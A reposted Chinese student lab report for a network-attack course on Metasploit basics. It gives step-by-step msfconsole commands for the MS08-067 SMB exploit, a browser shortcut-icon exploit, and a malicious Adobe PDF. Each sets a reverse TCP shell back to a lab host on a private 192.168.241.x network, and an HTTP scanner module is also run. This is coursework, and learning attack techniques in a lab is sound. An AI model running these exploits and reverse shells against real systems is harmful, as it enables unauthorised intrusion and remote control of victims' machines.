2017-2018-2 20155231《网络对抗技术》实验五: MSF基础应用

2017-2018-2 20155231《网络对抗技术》实验五: MSF基础应用

实验内容

一个主动攻击实践,如ms08_067

  1. 启用msf终端msfconsole

  2. 然后使用search命令搜索该漏洞对应的模块:search ms08_067

  3. 渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi” 包含四部分:模块类型、目标平台、目标服务和模块名字。

use exploit/windows/smb/ms08_067_netapi

  1. 查看信息:
    show payloads

  2. 选择攻击载荷:
    set payload generic/shell_reverse_tcp

  3. 查看配置渗透攻击所需的配置项:
    show options

  4. 查看渗透攻击模块所能成功渗透攻击的目标平台
    show targets

  5. 设置攻击Ip(默认端口445)
    set RHOST 192.168.241.138
  6. 成功后回连主机端口5231
    set LPORT 5231
    set LHOST 192.168.241.134
  7. 目标系统类型在这里为5(该系统没有数据执行保护功能(DEF)
    set target 5

  8. 查看设置后的选项设置的值是否正确:
    show options

  9. 发起渗透攻击
    exploit

  1. 查看结果
    ipconfig /all

一个针对浏览器的攻击,如ms11_050

这里在网上找了一个IE浏览器的漏洞:ms14_064(我们不一样)

  1. 首先输入search ms14_064查找漏洞

  2. 对浏览器进行攻击,输入use exploit/windows/browser/ms10_046_shortcut_icon_
  3. 输入show payloads,查看载荷进行选择,这里用实验载荷set payload generic/shell_reverse_tcp
  4. show options查询需要配置
  5. 输入set SRVHOST 192.168.241.134
    set LHOST 192.168.241.134
    set LPORT 5231
  6. 输入exploit生成URL

  7. 在windows端访问该URL
  8. 在kuil端输入sessions,可看到一个ID为1的连接
  9. 然后输入session -i 1,接入ID为1的连接,输入shell,获取成功。

一个针对客户端的攻击,如Adobe

  1. 首先还是先利用search adobe进行搜索

  2. 然后选择use windows/fileformat/adobe_flashplayer_button

3.然后set payload windows/meterpreter/reverse_tcp,利用show options查看所要配置的信息

  1. 需要对LHOSTLPORTFILENAME进行配置
  2. 输入exploit,生成pdf文件

  3. 输入use exploit/multi/handler,设置监听端口,主机号

  4. exploit开始监听
  5. 在windows端,打开20155231.pdf,成功回连

(我们不一样。。。试过很多个模板,然而只成功过一次,还没有截图。大部分都这样,回连没成功,端口没有打开)

成功应用任何一个辅助模块

  1. 利用show auxiliary,查看辅助模块(我们不一样)

  2. 选择scanner/http/title,扫描网页标签
  3. 查看配置,配置LHOST192.168.241.134

  4. 输入exploit进行监听

显示如图。但不知道标签记录在哪里,这漏洞有啥用?

试验后回答问题

  1. 用自己的话解释什么是exploit,payload,encode.
  • exploit是执行漏洞。
  • payload是有效载荷,执行代码的一个载体模板
  • encode是编码,对我们的程序或代码进行伪装

实践总结与体会

由于自己电脑配置有点渣。。两个虚拟机一起开略卡,用了同学的电脑做实验。成功的人都是一个样,没成功的人各有个的不同。查看过其他同学在实验中遇到的问题和解决方法。有的解决了,有的依然没又解决。。。

离实战还缺些什么技术或步骤?

很多用漏洞产生的文件都会遭到管家的查杀,实战中实现回连是个问题,诱导靶机执行操作也是问题

猜你喜欢

转载自www.cnblogs.com/javasyn/p/8982445.html
今日推荐